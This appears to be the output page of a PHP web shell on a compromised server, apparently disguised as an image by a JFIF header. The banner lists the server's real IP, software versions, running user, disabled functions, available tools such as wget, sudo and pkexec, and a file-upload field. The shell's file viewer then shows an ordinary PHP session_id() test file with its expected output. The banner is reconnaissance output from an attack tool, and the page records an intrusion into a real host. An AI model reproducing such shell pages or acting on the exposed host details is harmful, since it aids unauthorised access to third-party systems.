????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.22.194.224 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/session/tests/ |
Upload File : |
--TEST-- Test session_id() function : error functionality --SKIPIF-- <?php include('skipif.inc'); ?> --FILE-- <?php ob_start(); /* * Prototype : string session_id([string $id]) * Description : Get and/or set the current session id * Source code : ext/session/session.c */ echo "*** Testing session_id() : error functionality ***\n"; // Get an unset variable $unset_var = 10; unset($unset_var); class classA { public function __toString() { return "Hello World!"; } } $heredoc = <<<EOT Hello World! EOT; $fp = fopen(__FILE__, "r"); // Unexpected values to be passed as arguments $inputs = array( // Integer data /*1*/ 0, 1, 12345, -2345, // Float data /*5*/ 10.5, -10.5, 12.3456789000e10, 12.3456789000E-10, .5, // Null data /*10*/ NULL, null, // Boolean data /*12*/ true, false, TRUE, FALSE, // Empty strings /*16*/ "", '', // Invalid string data /*18*/ "Nothing", 'Nothing', $heredoc, // Object data /*21*/ new classA(), // Undefined data /*22*/ @$undefined_var, // Unset data /*23*/ @$unset_var, // Resource variable /*24*/ $fp ); $iterator = 1; foreach($inputs as $input) { echo "\n-- Iteration $iterator --\n"; var_dump(session_id($input)); $iterator++; }; fclose($fp); echo "Done"; ob_end_flush(); ?> --EXPECTF-- *** Testing session_id() : error functionality *** -- Iteration 1 -- string(0) "" -- Iteration 2 -- string(1) "0" -- Iteration 3 -- string(1) "1" -- Iteration 4 -- string(5) "12345" -- Iteration 5 -- string(5) "-2345" -- Iteration 6 -- string(4) "10.5" -- Iteration 7 -- string(5) "-10.5" -- Iteration 8 -- string(12) "123456789000" -- Iteration 9 -- string(13) "1.23456789E-9" -- Iteration 10 -- string(3) "0.5" -- Iteration 11 -- string(0) "" -- Iteration 12 -- string(0) "" -- Iteration 13 -- string(1) "1" -- Iteration 14 -- string(0) "" -- Iteration 15 -- string(1) "1" -- Iteration 16 -- string(0) "" -- Iteration 17 -- string(0) "" -- Iteration 18 -- string(0) "" -- Iteration 19 -- string(7) "Nothing" -- Iteration 20 -- string(7) "Nothing" -- Iteration 21 -- string(12) "Hello World!" -- Iteration 22 -- string(12) "Hello World!" -- Iteration 23 -- string(0) "" -- Iteration 24 -- Warning: session_id() expects parameter 1 to be string, resource given in %s on line %d NULL Done